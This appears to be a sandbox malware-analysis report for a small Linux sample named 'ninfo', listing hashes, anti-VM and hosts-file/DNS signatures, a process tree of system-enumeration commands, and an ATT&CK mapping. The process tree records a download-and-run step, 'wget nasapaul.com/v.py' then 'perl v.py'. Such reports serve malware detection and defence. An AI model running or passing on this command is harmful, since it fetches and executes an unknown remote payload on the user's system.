Overview

overview

9

Static

static

ninfo

ubuntu-18.04-amd64

9

ninfo

debian-9-armhf

9

ninfo

debian-9-mips

9

ninfo

debian-9-mipsel

9

Analysis

  • max time kernel
    0s
  • max time network
    153s
  • platform
    linux_mipsel
  • resource
    debian9-mipsel-en-20211208
  • resource tags

    arch:mipselimage:debian9-mipsel-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    09-08-2022 09:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ninfo

  • Size

    2KB

  • MD5

    ecf1fb8301600bf837437e21d17272b1

  • SHA1

    f554f8c16f5beea7ce09348ee1117a8ec6ad9fe2

  • SHA256

    f0f0c3f43e8537cb43cb932959534f038ec6ee9405aab2303d7da4d0cb34fb00

  • SHA512

    c0f7c727c165c61a925b1695c3c0c93d42158831447d915b730dd24370d24b33baa8cf88bf77d581a1c13568414206df09734374ca65c932941ecee4ac69de69

Score
9/10
antivm

Malware Config

Signatures

  • Attempts to identify hypervisor via CPU configuration 1 TTPs 4 IoCs

    Checks CPU information for indicators that the system is a virtual machine.

    antivm
  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 49 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 12 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ninfo
    /tmp/ninfo
    1⤵
    • Writes file to tmp directory
    PID:325
    • /bin/grep
      grep -c "^processor" /proc/cpuinfo
      2⤵
      • Attempts to identify hypervisor via CPU configuration
      PID:335
    • /bin/uname
      uname -a
      2⤵
        PID:351
      • /usr/bin/tput
        tput bold
        2⤵
          PID:353
        • /bin/sleep
          sleep 1
          2⤵
            PID:362
          • /bin/sleep
            sleep 1
            2⤵
              PID:363
            • /bin/sleep
              sleep 2
              2⤵
                PID:364
              • /bin/sleep
                sleep 2
                2⤵
                  PID:365
                • /usr/bin/id
                  id -u
                  2⤵
                  • Reads runtime system information
                  PID:366
                • /bin/sleep
                  sleep 3
                  2⤵
                    PID:367
                  • /bin/sleep
                    sleep 1
                    2⤵
                      PID:368
                    • /bin/sleep
                      sleep 1
                      2⤵
                        PID:369
                      • /bin/sleep
                        sleep 1
                        2⤵
                          PID:370
                        • /bin/sleep
                          sleep 1
                          2⤵
                            PID:371
                          • /usr/bin/wget
                            wget nasapaul.com/v.py
                            2⤵
                            • Modifies hosts file
                            • Writes DNS configuration
                            PID:372
                          • /usr/bin/perl
                            perl v.py
                            2⤵
                              PID:373
                          • /usr/bin/cut
                            cut -d: -f2
                            1⤵
                              PID:329
                            • /bin/grep
                              grep -m 1 "model name" /proc/cpuinfo
                              1⤵
                              • Attempts to identify hypervisor via CPU configuration
                              PID:328
                            • /bin/sed
                              sed -e "s/^ *//"
                              1⤵
                              • Reads runtime system information
                              PID:330
                            • /bin/sed
                              sed -e "s/\$//"
                              1⤵
                              • Reads runtime system information
                              PID:331
                            • /bin/grep
                              grep -m 1 stepping /proc/cpuinfo
                              1⤵
                              • Attempts to identify hypervisor via CPU configuration
                              PID:337
                            • /usr/bin/cut
                              cut -d: -f2
                              1⤵
                                PID:338
                              • /bin/sed
                                sed -e "s/^ *//"
                                1⤵
                                • Reads runtime system information
                                PID:339
                              • /bin/sed
                                sed -e "s/\$//"
                                1⤵
                                • Reads runtime system information
                                PID:340
                              • /bin/grep
                                grep -m 1 bogomips /proc/cpuinfo
                                1⤵
                                • Attempts to identify hypervisor via CPU configuration
                                PID:342
                              • /usr/bin/cut
                                cut -d: -f2
                                1⤵
                                  PID:343
                                • /bin/sed
                                  sed -e "s/^ *//"
                                  1⤵
                                  • Reads runtime system information
                                  PID:344
                                • /bin/sed
                                  sed -e "s/\$//"
                                  1⤵
                                  • Reads runtime system information
                                  PID:345
                                • /bin/grep
                                  grep -oP "\\d+"
                                  1⤵
                                    PID:349
                                  • /usr/bin/free
                                    free -m
                                    1⤵
                                    • Reads CPU attributes
                                    • Reads runtime system information
                                    PID:348
                                  • /usr/bin/head
                                    head -n 1
                                    1⤵
                                      PID:350
                                    • /bin/grep
                                      grep VGA
                                      1⤵
                                        PID:356
                                      • /usr/bin/lspci
                                        lspci
                                        1⤵
                                        • Enumerates kernel/hardware configuration
                                        PID:355
                                      • /usr/bin/cut
                                        cut -f5- -d " "
                                        1⤵
                                          PID:357
                                        • /bin/df
                                          df -h --total
                                          1⤵
                                          • Reads runtime system information
                                          PID:359
                                        • /bin/grep
                                          grep total
                                          1⤵
                                            PID:360
                                          • /usr/bin/awk
                                            awk "{ printf \"\" \$2 \"B\\n\\n\" }"
                                            1⤵
                                              PID:361

                                            Network

                                            MITRE ATT&CK Matrix ATT&CK v6

                                            Initial Access

                                            Execution

                                            Persistence

                                            Privilege Escalation

                                            Defense Evasion

                                            Virtualization/Sandbox Evasion

                                            1
                                            T1497

                                            Credential Access

                                            Discovery

                                            Virtualization/Sandbox Evasion

                                            1
                                            T1497

                                            System Information Discovery

                                            2
                                            T1082

                                            Lateral Movement

                                            Collection

                                            Exfiltration

                                            Command and Control

                                            Dynamic Resolution

                                            1
                                            T1568

                                            Impact

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads